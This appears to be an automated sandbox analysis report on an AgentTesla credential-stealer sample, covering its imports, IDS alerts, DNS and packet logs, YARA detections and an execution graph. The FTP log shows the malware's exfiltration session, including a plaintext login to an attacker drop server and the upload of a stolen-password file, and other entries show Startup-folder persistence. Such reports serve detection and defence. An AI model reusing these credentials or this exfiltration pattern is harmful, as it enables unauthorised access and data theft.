                                        RT_ICON0x11ba0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                        RT_ICON0x11dfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                        RT_ICON0x11f0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                        RT_MENU0xce4a00x50dataEnglishGreat Britain1.1375
                                        RT_STRING0xce4f00x594dataEnglishGreat Britain1.007703081232493
                                        RT_STRING0xcea840x68adataEnglishGreat Britain1.0065710872162486
                                        RT_STRING0xcf1100x490dataEnglishGreat Britain1.009417808219178
                                        RT_STRING0xcf5a00x5fcdataEnglishGreat Britain1.0071801566579635
                                        RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.984029484029484
                                        RT_STRING0xd01f80x466dataEnglishGreat Britain0.9609236234458259
                                        RT_STRING0xd06600x158COM executable for DOSEnglishGreat Britain1.0319767441860466
                                        RT_RCDATA0x11f4d00x384d7data1.000351234741886
                                        RT_GROUP_ICON0x1579ac0x76dataEnglishGreat Britain0.6610169491525424
                                        RT_GROUP_ICON0x157a280x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0x157a400x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0x157a580x14dataEnglishGreat Britain1.25
                                        RT_VERSION0x157a700xdcdataEnglishGreat Britain0.6181818181818182
                                        RT_MANIFEST0x157b500x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                        Imports

                                        DLLImport
                                        KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                        ADVAPI32.dllGetAce
                                        COMCTL32.dllImageList_Remove
                                        COMDLG32.dllGetOpenFileNameW
                                        GDI32.dllLineTo
                                        IPHLPAPI.DLLIcmpSendEcho
                                        MPR.dllWNetUseConnectionW
                                        ole32.dllCoGetObject
                                        OLEAUT32.dllVariantInit
                                        PSAPI.DLLGetProcessMemoryInfo
                                        SHELL32.dllDragFinish
                                        USER32.dllGetDC
                                        USERENV.dllLoadUserProfileW
                                        UxTheme.dllIsThemeActive
                                        VERSION.dllVerQueryValueW
                                        WININET.dllFtpOpenFileW
                                        WINMM.dlltimeGetTime
                                        WSOCK32.dllconnect

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-11T05:51:02.044557+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549707162.241.62.6321TCP
                                        2025-01-11T05:51:02.441601+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549713162.241.62.6333214TCP
                                        2025-01-11T05:51:02.446904+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549713162.241.62.6333214TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2025 05:50:47.930877924 CET4970480192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:47.936566114 CET8049704208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:50:47.936650991 CET4970480192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:47.940356970 CET4970480192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:47.945952892 CET8049704208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:50:48.389733076 CET8049704208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:50:48.434722900 CET4970480192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:49.328093052 CET4970521192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:50:49.332957983 CET2149705162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:50:49.333034039 CET4970521192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:50:49.336819887 CET4970521192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:50:49.343089104 CET2149705162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:50:49.343146086 CET4970521192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:50:59.627724886 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:59.632642031 CET8049706208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:50:59.632709026 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:59.632908106 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:50:59.637643099 CET8049706208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:51:00.097754955 CET4970480192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:51:00.103748083 CET8049706208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:51:00.153556108 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:51:00.753202915 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:00.758207083 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:00.758282900 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.263539076 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.263787031 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.268522978 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.381006956 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.381308079 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.386058092 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.588135958 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.588346958 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.593199968 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.700635910 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.700783968 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.705564022 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.813110113 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.813265085 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.818094969 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.925823927 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:01.925992012 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:01.930840969 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.038559914 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.039372921 CET4971333214192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.044356108 CET3321449713162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.044440985 CET4971333214192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.044557095 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.049344063 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.441365957 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.441601038 CET4971333214192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.441907883 CET4971333214192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.446516037 CET3321449713162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.446830034 CET3321449713162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.446903944 CET4971333214192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.481695890 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:02.571655989 CET2149707162.241.62.63192.168.2.5
                                        Jan 11, 2025 05:51:02.622337103 CET4970721192.168.2.5162.241.62.63
                                        Jan 11, 2025 05:51:42.354892015 CET8049706208.95.112.1192.168.2.5
                                        Jan 11, 2025 05:51:42.355618954 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:51:50.763641119 CET4970680192.168.2.5208.95.112.1
                                        Jan 11, 2025 05:51:50.768595934 CET8049706208.95.112.1192.168.2.5

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2025 05:50:47.889624119 CET5223753192.168.2.51.1.1.1
                                        Jan 11, 2025 05:50:47.896445990 CET53522371.1.1.1192.168.2.5
                                        Jan 11, 2025 05:50:49.011531115 CET6426753192.168.2.51.1.1.1
                                        Jan 11, 2025 05:50:49.326802969 CET53642671.1.1.1192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 11, 2025 05:50:47.889624119 CET192.168.2.51.1.1.10x45f7Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                        Jan 11, 2025 05:50:49.011531115 CET192.168.2.51.1.1.10xf262Standard query (0)ftp.antoniomayol.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 11, 2025 05:50:47.896445990 CET1.1.1.1192.168.2.50x45f7No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                        Jan 11, 2025 05:50:49.326802969 CET1.1.1.1192.168.2.50xf262No error (0)ftp.antoniomayol.comantoniomayol.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 11, 2025 05:50:49.326802969 CET1.1.1.1192.168.2.50xf262No error (0)antoniomayol.com162.241.62.63A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • ip-api.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549704208.95.112.1805376C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 11, 2025 05:50:47.940356970 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Jan 11, 2025 05:50:48.389733076 CET175INHTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 04:50:47 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549706208.95.112.1806512C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 11, 2025 05:50:59.632908106 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Jan 11, 2025 05:51:00.103748083 CET175INHTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 04:50:59 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 48
                                        X-Rl: 43
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false


                                        FTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Jan 11, 2025 05:51:01.263539076 CET2149707162.241.62.63192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21.220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                        Jan 11, 2025 05:51:01.263787031 CET4970721192.168.2.5162.241.62.63USER johnson@antoniomayol.com
                                        Jan 11, 2025 05:51:01.381006956 CET2149707162.241.62.63192.168.2.5331 User johnson@antoniomayol.com OK. Password required
                                        Jan 11, 2025 05:51:01.381308079 CET4970721192.168.2.5162.241.62.63PASS cMhKDQUk1{;%
                                        Jan 11, 2025 05:51:01.588135958 CET2149707162.241.62.63192.168.2.5230-OK. Current restricted directory is /
                                        230-OK. Current restricted directory is /230 31 Kbytes used (0%) - authorized: 2048000 Kb
                                        Jan 11, 2025 05:51:01.700635910 CET2149707162.241.62.63192.168.2.5504 Unknown command
                                        Jan 11, 2025 05:51:01.700783968 CET4970721192.168.2.5162.241.62.63PWD
                                        Jan 11, 2025 05:51:01.813110113 CET2149707162.241.62.63192.168.2.5257 "/" is your current location
                                        Jan 11, 2025 05:51:01.813265085 CET4970721192.168.2.5162.241.62.63TYPE I
                                        Jan 11, 2025 05:51:01.925823927 CET2149707162.241.62.63192.168.2.5200 TYPE is now 8-bit binary
                                        Jan 11, 2025 05:51:01.925992012 CET4970721192.168.2.5162.241.62.63PASV
                                        Jan 11, 2025 05:51:02.038559914 CET2149707162.241.62.63192.168.2.5227 Entering Passive Mode (162,241,62,63,129,190)
                                        Jan 11, 2025 05:51:02.044557095 CET4970721192.168.2.5162.241.62.63STOR PW_user-226533_2025_01_10_23_51_00.html
                                        Jan 11, 2025 05:51:02.441365957 CET2149707162.241.62.63192.168.2.5150 Accepted data connection
                                        Jan 11, 2025 05:51:02.571655989 CET2149707162.241.62.63192.168.2.5226-31 Kbytes used (0%) - authorized: 2048000 Kb
                                        226-31 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred
                                        226-31 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.114 seconds (measured here), 2.75 Kbytes per second

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:23:50:44
                                        Start date:10/01/2025
                                        Path:C:\Users\user\Desktop\toIuQILmr1.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0xdd0000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:23:50:45
                                        Start date:10/01/2025
                                        Path:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0xc50000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 71%, ReversingLabs
                                        • Detection: 76%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:23:50:46
                                        Start date:10/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0x4c0000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:23:50:56
                                        Start date:10/01/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                                        Imagebase:0x7ff79e710000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:23:50:57
                                        Start date:10/01/2025
                                        Path:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                                        Imagebase:0xc50000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:23:50:58
                                        Start date:10/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                                        Imagebase:0x7b0000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3.6%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:8.6%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:71
                                          execution_graph 98083 e10251 98095 defb84 98083->98095 98085 e10267 98086 e102e8 98085->98086 98087 e1027d 98085->98087 98104 ddfe40 98086->98104 98184 dd9fbd 60 API calls 98087->98184 98091 e102bc 98094 e102dc Mailbox 98091->98094 98185 e385d9 59 API calls Mailbox 98091->98185 98092 e10ce1 Mailbox 98094->98092 98186 e3a0b5 89 API calls 4 library calls 98094->98186 98096 defba2 98095->98096 98097 defb90 98095->98097 98098 defba8 98096->98098 98099 defbd1 98096->98099 98187 dd9e9c 60 API calls Mailbox 98097->98187 98188 df0ff6 98098->98188 98198 dd9e9c 60 API calls Mailbox 98099->98198 98103 defb9a 98103->98085 98227 dd82e0 98104->98227 98106 ddfe9d 98107 e14b57 98106->98107 98152 de0856 98106->98152 98232 ddf394 98106->98232 98349 e3a0b5 89 API calls 4 library calls 98107->98349 98111 e14b6c 98112 e14cb7 98112->98111 98115 ddffac 98112->98115 98355 e4a5ee 85 API calls Mailbox 98112->98355 98113 ddff9e 98113->98112 98113->98115 98353 e26c62 59 API calls 2 library calls 98113->98353 98114 de0677 98122 df0ff6 Mailbox 59 API calls 98114->98122 98124 e14d23 98115->98124 98171 e14f7d 98115->98171 98236 dd84dc 98115->98236 98116 e14c01 98116->98111 98351 e3a0b5 89 API calls 4 library calls 98116->98351 98119 df0ff6 59 API calls Mailbox 98157 ddff33 98119->98157 98130 de06a5 _memmove 98122->98130 98123 e14c72 98354 e26665 59 API calls 2 library calls 98123->98354 98131 e14d41 98124->98131 98357 dd8720 59 API calls Mailbox 98124->98357 98128 e14b7f 98128->98116 98350 ddf803 331 API calls 98128->98350 98141 df0ff6 Mailbox 59 API calls 98130->98141 98137 e14d52 98131->98137 98358 dd8720 59 API calls Mailbox 98131->98358 98132 de0004 98139 e14f00 98132->98139 98140 de0092 98132->98140 98176 de02d9 Mailbox _memmove 98132->98176 98133 e14c95 98135 dda000 331 API calls 98133->98135 98134 e14cdc Mailbox 98134->98115 98356 e26c62 59 API calls 2 library calls 98134->98356 98135->98112 98137->98176 98359 e26621 59 API calls Mailbox 98137->98359 98368 e39d71 60 API calls 98139->98368 98143 df0ff6 Mailbox 59 API calls 98140->98143 98182 de0266 _memmove 98141->98182 98146 de0099 98143->98146 98146->98152 98243 de0b30 98146->98243 98148 e14e77 98149 dda000 331 API calls 98148->98149 98151 e14eb1 98149->98151 98151->98111 98363 dd8620 98151->98363 98348 e3a0b5 89 API calls 4 library calls 98152->98348 98154 de0112 98154->98130 98154->98152 98162 de0146 98154->98162 98156 e14c36 98352 e3a0b5 89 API calls 4 library calls 98156->98352 98157->98111 98157->98113 98157->98114 98157->98119 98157->98128 98157->98130 98157->98156 98324 dda000 98157->98324 98161 e14edc 98367 e3a0b5 89 API calls 4 library calls 98161->98367 98167 de0167 98162->98167 98369 dd81a7 98162->98369 98167->98152 98169 e14f4e 98167->98169 98174 de01ac 98167->98174 98168 de04f8 98168->98094 98373 dd9e9c 60 API calls Mailbox 98169->98373 98170 df0ff6 59 API calls Mailbox 98170->98176 98171->98111 98374 e3a0b5 89 API calls 4 library calls 98171->98374 98173 de0238 98320 dd9e9c 60 API calls Mailbox 98173->98320 98174->98152 98174->98171 98174->98173 98176->98148 98176->98152 98176->98161 98176->98168 98176->98170 98177 e14e46 98176->98177 98322 dd88a0 68 API calls __cinit 98176->98322 98323 dd87c0 68 API calls 98176->98323 98360 e35bd9 68 API calls 98176->98360 98361 dd8b13 69 API calls Mailbox 98176->98361 98362 dd9e9c 60 API calls Mailbox 98176->98362 98180 df0ff6 Mailbox 59 API calls 98177->98180 98178 de024b 98178->98152 98321 dd843f 59 API calls Mailbox 98178->98321 98180->98148 98182->98176 98183 de02c2 98182->98183 98347 dd9df0 59 API calls Mailbox 98182->98347 98183->98094 98184->98091 98185->98094 98186->98092 98187->98103 98192 df0ffe 98188->98192 98190 df1018 98190->98103 98192->98190 98193 df101c std::exception::exception 98192->98193 98199 df594c 98192->98199 98216 df35e1 RtlDecodePointer 98192->98216 98217 df87db RaiseException 98193->98217 98195 df1046 98218 df8711 58 API calls _free 98195->98218 98197 df1058 98197->98103 98198->98103 98200 df59c7 98199->98200 98207 df5958 98199->98207 98225 df35e1 RtlDecodePointer 98200->98225 98202 df59cd 98226 df8d68 58 API calls __getptd_noexit 98202->98226 98205 df598b RtlAllocateHeap 98205->98207 98215 df59bf 98205->98215 98207->98205 98208 df59b3 98207->98208 98209 df5963 98207->98209 98213 df59b1 98207->98213 98222 df35e1 RtlDecodePointer 98207->98222 98223 df8d68 58 API calls __getptd_noexit 98208->98223 98209->98207 98219 dfa3ab 58 API calls __NMSG_WRITE 98209->98219 98220 dfa408 58 API calls 6 library calls 98209->98220 98221 df32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98209->98221 98224 df8d68 58 API calls __getptd_noexit 98213->98224 98215->98192 98216->98192 98217->98195 98218->98197 98219->98209 98220->98209 98222->98207 98223->98213 98224->98215 98225->98202 98226->98215 98228 dd82ef 98227->98228 98231 dd830a 98227->98231 98375 dd7faf 98228->98375 98230 dd82f7 CharUpperBuffW 98230->98231 98231->98106 98234 ddf3b1 98232->98234 98233 ddf3d2 98233->98157 98234->98233 98379 e3a0b5 89 API calls 4 library calls 98234->98379 98237 dd84ed 98236->98237 98238 e0f1e6 98236->98238 98239 df0ff6 Mailbox 59 API calls 98237->98239 98240 dd84f4 98239->98240 98241 dd8515 98240->98241 98380 dd8794 59 API calls Mailbox 98240->98380 98241->98124 98241->98132 98244 e150ed 98243->98244 98254 de0b55 98243->98254 98442 e3a0b5 89 API calls 4 library calls 98244->98442 98246 de0e44 98247 de0e5a 98246->98247 98439 de11d0 10 API calls Mailbox 98246->98439 98247->98154 98250 de1044 98250->98247 98251 de1051 98250->98251 98440 de11f3 331 API calls Mailbox 98251->98440 98252 de0bab PeekMessageW 98319 de0b65 Mailbox 98252->98319 98254->98319 98443 dd9fbd 60 API calls 98254->98443 98444 e268bf 331 API calls 98254->98444 98255 de1058 LockWindowUpdate DestroyWindow GetMessageW 98255->98247 98258 de108a 98255->98258 98257 e152ab Sleep 98257->98319 98259 e16082 TranslateMessage DispatchMessageW GetMessageW 98258->98259 98259->98259 98261 e160b2 98259->98261 98261->98247 98262 e1517a TranslateAcceleratorW 98265 de0fa3 PeekMessageW 98262->98265 98262->98319 98263 dd9fbd 60 API calls 98263->98319 98264 de0fbf TranslateMessage DispatchMessageW 98264->98265 98265->98319 98266 e15c49 WaitForSingleObject 98269 e15c66 GetExitCodeProcess CloseHandle 98266->98269 98266->98319 98268 de0e73 timeGetTime 98268->98319 98305 de10f5 98269->98305 98270 de0fdd Sleep 98304 de0fee Mailbox 98270->98304 98271 dd81a7 59 API calls 98271->98319 98273 e15f22 Sleep 98273->98304 98275 df0ff6 59 API calls Mailbox 98275->98319 98276 ddb89c 304 API calls 98276->98319 98278 de10ae timeGetTime 98441 dd9fbd 60 API calls 98278->98441 98279 df0719 timeGetTime 98279->98304 98282 e15fb9 GetExitCodeProcess 98286 e15fe5 CloseHandle 98282->98286 98287 e15fcf WaitForSingleObject 98282->98287 98284 e561ac 110 API calls 98284->98304 98285 ddb93d 109 API calls 98285->98304 98286->98304 98287->98286 98287->98319 98290 e15c9e 98290->98305 98291 e154a2 Sleep 98291->98319 98292 e16041 Sleep 98292->98319 98298 dda000 304 API calls 98298->98319 98301 ddfe40 304 API calls 98301->98319 98304->98279 98304->98282 98304->98284 98304->98285 98304->98290 98304->98291 98304->98292 98304->98305 98304->98319 98469 dd77c7 98304->98469 98474 e328f7 60 API calls 98304->98474 98475 dd9fbd 60 API calls 98304->98475 98476 dd7f41 98304->98476 98480 dd8b13 69 API calls Mailbox 98304->98480 98481 ddb89c 331 API calls 98304->98481 98482 e26a50 60 API calls 98304->98482 98483 e354e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98304->98483 98484 e33e91 66 API calls Mailbox 98304->98484 98305->98154 98306 dd7f41 59 API calls 98306->98319 98307 e3a0b5 89 API calls 98307->98319 98309 dd8620 69 API calls 98309->98319 98310 dd9df0 59 API calls Mailbox 98310->98319 98312 e266f4 59 API calls Mailbox 98312->98319 98313 dd8b13 69 API calls 98313->98319 98314 e159ff VariantClear 98314->98319 98315 e27405 59 API calls 98315->98319 98316 e15a95 VariantClear 98316->98319 98317 dd8e34 59 API calls Mailbox 98317->98319 98318 e15843 VariantClear 98318->98319 98319->98246 98319->98252 98319->98257 98319->98262 98319->98263 98319->98264 98319->98265 98319->98266 98319->98268 98319->98270 